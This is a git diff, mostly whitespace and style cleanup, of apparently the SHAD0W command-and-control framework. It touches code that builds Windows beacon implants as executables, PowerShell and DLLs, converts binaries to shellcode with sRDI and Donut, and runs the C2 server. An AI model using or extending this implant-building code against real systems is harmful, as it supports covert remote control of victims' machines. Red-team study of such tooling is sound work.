# with open("/root/shad0w/beacon/beacon.exe", 'rb') as file:
|
||||
|
@ -55,6 +58,7 @@ def format_exe(builder, length=True, code=False):
|
|||
with open(builder.outfile, 'rb') as file:
|
||||
return file.read()
|
||||
|
||||
|
||||
def format_powershell(builder, length=True, code=False):
|
||||
|
||||
outfile = builder.outfile
|
||||
|
@ -79,6 +83,7 @@ def format_powershell(builder, length=True, code=False):
|
|||
if code:
|
||||
return pcode
|
||||
|
||||
|
||||
def format_dll(builder, length=True, code=False):
|
||||
|
||||
# get the the beacon shellcode
|
||||
|
@ -96,6 +101,7 @@ def format_dll(builder, length=True, code=False):
|
|||
with open(builder.outfile, 'rb') as file:
|
||||
return file.read()
|
||||
|
||||
|
||||
def create(builder):
|
||||
if builder.format == "raw":
|
||||
return format_raw(builder)
|
||||
|
|
|
@ -1,5 +1,6 @@
|
|||
import json
|
||||
|
||||
|
||||
class Builder(object):
|
||||
|
||||
def __init__(self, shad0w):
|
||||
|
@ -27,7 +28,8 @@ class Builder(object):
|
|||
try:
|
||||
if resp["task"] == None:
|
||||
resp["task"] = 0x1000
|
||||
except KeyError: pass
|
||||
except KeyError:
|
||||
pass
|
||||
|
||||
# now return the dict in json format
|
||||
|
||||
|
|
|
@ -5,6 +5,7 @@ import tempfile
|
|||
|
||||
from lib.ShellcodeRDI import *
|
||||
|
||||
|
||||
def generate_srdi(file, flags):
|
||||
""" generate shellcode from a reflective dll using sRDI """
|
||||
|
||||
|
@ -15,12 +16,14 @@ def generate_srdi(file, flags):
|
|||
|
||||
return ConvertToShellcode(dll_data, hfunc, b"None", flags)
|
||||
|
||||
|
||||
def parse_donut_error(data, filename):
|
||||
if "Error : File not found." in data:
|
||||
print(f"Unable to find '{filename}'.")
|
||||
else:
|
||||
print(f"Failed to execute '{filename}'.")
|
||||
|
||||
|
||||
def generate(file, args, params, parse=True):
|
||||
""" generate shellcode from a pe using Donut """
|
||||
|
||||
|
@ -110,4 +113,4 @@ def generate(file, args, params, parse=True):
|
|||
|
||||
# return the raw shellcode
|
||||
with open(temp.name, "rb") as file:
|
||||
return file.read()
|
||||
return file.read()
|
||||
|
|
35
lib/tools.py
35
lib/tools.py
|
@ -9,8 +9,9 @@ from datetime import datetime
|
|||
|
||||
from lib import buildtools
|
||||
|
||||
# list all command scripts in the commands dir, append to list of commands
|
||||
|
||||
def get_commands():
|
||||
# list all command scripts in the commands dir, append to list of commands
|
||||
commandList = []
|
||||
for _, _, f in os.walk("/root/shad0w/lib/commands/"):
|
||||
for file in f:
|
||||
|
@ -18,16 +19,18 @@ def get_commands():
|
|||
commandList.append(file.replace(".py",""))
|
||||
return commandList
|
||||
|
||||
|
||||
def generate_beacon_id():
|
||||
# get md5 hash of the current date + time
|
||||
return hashlib.md5(str(datetime.now()).encode()).hexdigest()
|
||||
|
||||
|
||||
def get_data_from_json(jdata):
|
||||
# get the data from data
|
||||
|
||||
id = ""
|
||||
id = ""
|
||||
opcode = 0
|
||||
data = ""
|
||||
data = ""
|
||||
|
||||
# if we get any errors, just return the above values and this req will then be ignored
|
||||
try:
|
||||
|
@ -43,18 +46,19 @@ def get_data_from_json(jdata):
|
|||
|
||||
return id, opcode, data
|
||||
|
||||
|
||||
async def compile_and_store_static(shad0w):
|
||||
# compile a static secure beacon and store it in memory
|
||||
shad0w.payloads["x64_secure_static"] = {}
|
||||
|
||||
arch = "x64"
|
||||
arch = "x64"
|
||||
platform = "windows"
|
||||
secure = "secure"
|
||||
static = "static"
|
||||
secure = "secure"
|
||||
static = "static"
|
||||
|
||||
# basically just make a random string
|
||||
dir_name = generate_beacon_id()
|
||||
lib_dir_name = "/tmp/" + dir_name + "/lib/"
|
||||
dir_name = generate_beacon_id()
|
||||
lib_dir_name = "/tmp/" + dir_name + "/lib/"
|
||||
build_dir_name = "/tmp/" + dir_name + "/build/"
|
||||
|
||||
Path(lib_dir_name).mkdir(parents=True, exist_ok=True)
|
||||
|
@ -89,6 +93,7 @@ async def compile_and_store_static(shad0w):
|
|||
|
||||
return
|
||||
|
||||
|
||||
async def compile_and_store_static_srdi(shad0w):
|
||||
# compile a static secure beacon and store it in memory
|
||||
shad0w.payloads["x64_secure_static_srdi"] = {}
|
||||
|
@ -99,14 +104,14 @@ async def compile_and_store_static_srdi(shad0w):
|
|||
static = "static"
|
||||
|
||||
# basically just make a random string
|
||||
dir_name = generate_beacon_id()
|
||||
lib_dir_name = "/tmp/" + dir_name + "/lib/"
|
||||
dir_name = generate_beacon_id()
|
||||
lib_dir_name = "/tmp/" + dir_name + "/lib/"
|
||||
build_dir_name = "/tmp/" + dir_name + "/build/"
|
||||
|
||||
Path(lib_dir_name).mkdir(parents=True, exist_ok=True)
|
||||
Path(build_dir_name).mkdir(parents=True, exist_ok=True)
|
||||
|
||||
mod_name = f"{build_dir_name}../beacon.dll"
|
||||
mod_name = f"{build_dir_name}../beacon.dll"
|
||||
|
||||
os.system(f"cp -r /root/shad0w/beacon/lib/* {lib_dir_name}")
|
||||
|
||||
|
@ -136,13 +141,15 @@ async def compile_and_store_static_srdi(shad0w):
|
|||
shad0w.compile_finished = True
|
||||
return
|
||||
|
||||
|
||||
def loading_banner(shad0w):
|
||||
while shad0w.compile_finished != True:
|
||||
loading = list("Starting SHAD0W C2...")
|
||||
iter = 1
|
||||
colour = random.choice([1,2,3,4,5,6])
|
||||
colour = random.choice([1, 2, 3, 4, 5, 6])
|
||||
for i in loading:
|
||||
if shad0w.compile_finished == True: break
|
||||
if shad0w.compile_finished == True:
|
||||
break
|
||||
time.sleep(0.15)
|
||||
|
||||
i = f"\033[1;3{colour}m" + i + "\033[0m"
|
||||
|
@ -154,4 +161,4 @@ def loading_banner(shad0w):
|
|||
sys.stdout.write("\r" + " "*100 + "\r")
|
||||
sys.stdout.flush()
|
||||
|
||||
shad0w.screen_finish = True
|
||||
shad0w.screen_finish = True
|
||||
|
|
35
shad0w.py
35
shad0w.py
|
@ -19,6 +19,7 @@ from lib import mirror
|
|||
from lib import payload_format
|
||||
from lib import tools
|
||||
|
||||
|
||||
class Shad0wC2(object):
|
||||
|
||||
def __init__(self, args):
|
||||
|
@ -26,42 +27,42 @@ class Shad0wC2(object):
|
|||
super(Shad0wC2, self).__init__()
|
||||
|
||||
# payload store
|
||||
self.payloads = {}
|
||||
self.payloads = {}
|
||||
|
||||
# declare all the vitial variables to run.
|
||||
self.addr = (args['address'], args['port'])
|
||||
self.debugv = args['debug']
|
||||
self.sslkey = args['key']
|
||||
self.sslcrt = args['cert']
|
||||
self.addr = (args['address'], args['port'])
|
||||
self.debugv = args['debug']
|
||||
self.sslkey = args['key']
|
||||
self.sslcrt = args['cert']
|
||||
|
||||
# framework variables
|
||||
self.variables = {}
|
||||
self.variables = {}
|
||||
|
||||
# set the msf callback size
|
||||
self.variables["MsfUriSize"] = 1337
|
||||
|
||||
# website we can mirror
|
||||
self.mirror = args['mirror']
|
||||
self.mirror = args['mirror']
|
||||
|
||||
# endpoint for modules to callback to
|
||||
self.endpoint = args['endpoint']
|
||||
self.endpoint = args['endpoint']
|
||||
|
||||
# runtime variables
|
||||
self.beacons = {}
|
||||
self.beacon_count = 0
|
||||
self.current_beacon = None
|
||||
self.beacons = {}
|
||||
self.beacon_count = 0
|
||||
self.current_beacon = None
|
||||
|
||||
# loading screen stuff
|
||||
self.screen_finish = False
|
||||
self.screen_finish = False
|
||||
|
||||
# get the debug/logging stuff ready
|
||||
self.debug = debug.Debug(self.debugv)
|
||||
self.debug = debug.Debug(self.debugv)
|
||||
|
||||
# console class
|
||||
self.console = console.Console(self)
|
||||
self.console = console.Console(self)
|
||||
|
||||
# super useful
|
||||
self.crypt = encryption
|
||||
self.crypt = encryption
|
||||
|
||||
def start(self):
|
||||
|
||||
|
@ -156,8 +157,6 @@ class Shad0wBuilder(object):
|
|||
print("\033[1;32m[+]\033[0m", f"Created {self.outfile} ({length} bytes)")
|
||||
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
# sort the first cmd switch to decide weather we beacon or listen
|
||||
|
@ -201,4 +200,4 @@ if __name__ == '__main__':
|
|||
if args["mode"] == "beacon":
|
||||
# build the beacon
|
||||
shad0w = Shad0wBuilder(args)
|
||||
shad0w.build()
|
||||
shad0w.build()
|
||||
|
|
Loading…
Reference in New Issue